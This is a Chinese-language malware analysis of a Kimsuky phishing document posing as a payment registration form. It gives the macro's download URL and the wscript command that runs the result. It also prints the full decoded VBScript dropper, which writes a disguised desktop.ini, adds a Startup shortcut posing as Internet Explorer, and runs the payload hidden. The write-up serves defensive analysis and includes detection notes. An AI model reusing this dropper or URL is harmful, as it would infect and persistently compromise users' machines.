类型:maldoc 钓鱼

组织:kimsuky 朝鲜

分析时间:2021.7.21

md5: 8de75256d0e579416263cb3c61fc6c55

样本地址:https://app.any.run/tasks/2338731c-16f5-40f8-ab87-7780b74b5c3a/

样本是一个 doc 文档，其内容为某支付登记表。

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/909d2b1e-9597-4a1d-a844-8443fee91080/Untitled.png

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/8beb9e49-3504-4efb-8d7c-2d88fce1fcf1/Untitled.png

在宏代码中有个http下载,地址:http://1213rt.atwebpages.com/cohb/d.php?filename=corona

http get请求一个base64字符串,解码后保存到 C:\Users\xxxx\AppData\Roaming\OneDriver.exe

并运行 wscript.exe //e:vbscript //b C:\Users\xxxx\AppData\Roaming\OneDriver.exe

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/8e2f24e8-3b01-4d98-b03b-2d5c328b1b12/Untitled.png

base64解码函数

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/f305bfb2-56ce-41c4-a4eb-4a2da1c61b2d/Untitled.png

base64解码后为一个vbs脚本,代码如下

' Custom Base64 decoder (standard alphabet) used by the dropper below to turn the
' embedded spy_script string back into the second-stage file.
' Parameter base64String: the encoded text; CRLF, tabs and spaces are stripped first.
' Returns the decoded bytes as a string built with Chr. On a bad character the
' function raises error 2 and exits before the result is assigned; because of
' On Error Resume Next the caller then receives Empty rather than an error.
Function afghhha(ByVal base64String)
' Swallows every runtime error inside this function, including the Err.Raise below.
On Error Resume Next
     ' Standard Base64 alphabet; the lookup below is case-sensitive (vbBinaryCompare).
     Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
     Dim dataLength, sOut, groupBegin
  
     ' Whitespace / line-break cleanup before decoding.
     base64String = Replace(base64String, vbCrLf, "")
     base64String = Replace(base64String, vbTab, "")
     base64String = Replace(base64String, " ", "")
     dataLength = Len(base64String)
     
     ' Each 4-character group yields up to 3 bytes.
     ' NOTE(review): a trailing partial group (length not a multiple of 4) is not
     ' rejected here; Mid past the end returns "", and InStr with an empty search
     ' string reports position 1, so such characters would decode as value 0 --
     ' confirm against the interpreter if it matters for the analysis.
     For groupBegin = 1 To dataLength Step 4
          Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
          numDataBytes = 3
          nGroup = 0
        
          For CharCounter = 0 To 3
               thisChar = Mid(base64String, groupBegin + CharCounter, 1)
            
               ' "=" padding: one fewer output byte for this group, contributes 0 bits.
               If thisChar = "=" Then
                    numDataBytes = numDataBytes - 1
                    thisData = 0
               Else
                    ' InStr is 1-based, so -1 gives the 0..63 value; not found gives -1.
                    thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
               End If
  
               If thisData = -1 Then
                    ' The raised error is suppressed by On Error Resume Next; Exit Function
                    ' then leaves afghhha unassigned (Empty), so a caller cannot tell from
                    ' the return value that decoding failed.
                    Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
                    Exit Function
               End If
            
               ' Accumulate four 6-bit values into one 24-bit group.
               nGroup = 64 * nGroup + thisData
          Next
          ' Left-pad the 24-bit group to six hex digits, then split it into three bytes.
          nGroup = Hex(nGroup)
          nGroup = String(6 - Len(nGroup), "0") & nGroup
          pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 5, 2)))
          ' Keep only the bytes not cancelled by "=" padding.
          sOut = sOut & Left(pOut, numDataBytes)
     Next
     afghhha = sOut
End Function

' Dropper stage: decodes the embedded payload to disk, then sets up persistence and
' launches it. Errors are suppressed for the whole script, so a failed step (e.g. the
' decoder returning Empty) is never reported.
On Error Resume Next

Set WshShell = CreateObject("Wscript.shell")
' Drop location: %APPDATA%\Microsoft\desktop.ini -- a name chosen to resemble the
' harmless per-folder desktop.ini; the file actually holds VBScript (see the
' //e:vbscript argument below).
' NOTE(review): this listing shows doubled backslashes. VBScript string literals have
' no escape sequences, so either this copy was escaped when the writeup was produced
' or the literal path really contains "\\" (which Windows path handling likely tolerates);
' the prose above shows single backslashes -- verify against the raw sample.
appdatafolder = WshShell.expandenvironmentstrings("%appdata%")
spyfile = appdatafolder & "\\Microsoft\\desktop.ini"

' Embedded second stage (base64). The payload string was removed from this copy of the page.
spy_script = "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"
Set fs = CreateObject("Scripting.FileSystemObject")
' Overwrite (second argument True) the drop file with the decoded payload.
Set ofile=fs.CreateTextFile(spyfile,True)
ofile.Write afghhha(spy_script)
ofile.Close

' Persistence: a .lnk placed in the user's Startup folder (SpecialFolders("Startup")),
' not on the desktop, so the payload is re-run at every logon. It is named after
' Internet Explorer and given the iexplore.exe icon below to blend in.
lnkpath = WshShell.SpecialFolders("Startup") + "\\Internet Explorer.lnk"
Set oMyShortcut = WshShell.CreateShortcut(lnkpath)
' Force the VBScript engine on a .ini file (//e:vbscript) and run in batch mode (//b,
' no script-error dialogs); the drop path is wrapped in double quotes.
oMyShortcut.Arguments = "//e:vbscript //b " & """" & spyfile & """"
windowsfolder = WshShell.expandenvironmentstrings("%windir%")
oMyShortcut.TargetPath = windowsfolder & "\\System32\\wscript.exe"
oMyShortcut.WorkingDirectory = windowsfolder & "\\System32"
oMyShortcut.HotKey = "CTRL+ALT+SHIFT+X"
oMyShortcut.Description = ""
' Icon borrowed from iexplore.exe so the shortcut looks like a browser link.
oMyShortcut.IconLocation = WshShell.ExpandEnvironmentStrings("%SystemDrive%") + "\\Program Files\\Internet Explorer\\iexplore.exe" + ",0"
oMyShortcut.save
' Also launch the payload right away: window style 0 (hidden), no wait for exit.
' Detection notes for defenders: wscript.exe started with "//e:vbscript" on a path
' ending in desktop.ini; a new .lnk in the Startup folder whose target is wscript.exe;
' a desktop.ini written under %APPDATA%\Microsoft that is not valid INI content.
WshShell.run oMyShortcut.TargetPath + " " + oMyShortcut.Arguments , 0 , false

此vbs功能是解码spy_script中的base64字符串,保存到 C:\Users\xxxxx\AppData\Roaming\Microsoft\desktop.ini

并且在桌面创建图标是Internet Explorer的快捷方式,功能是运行C:\Users\xxxx\AppData\Roaming\Microsoft\desktop.ini的vbs脚本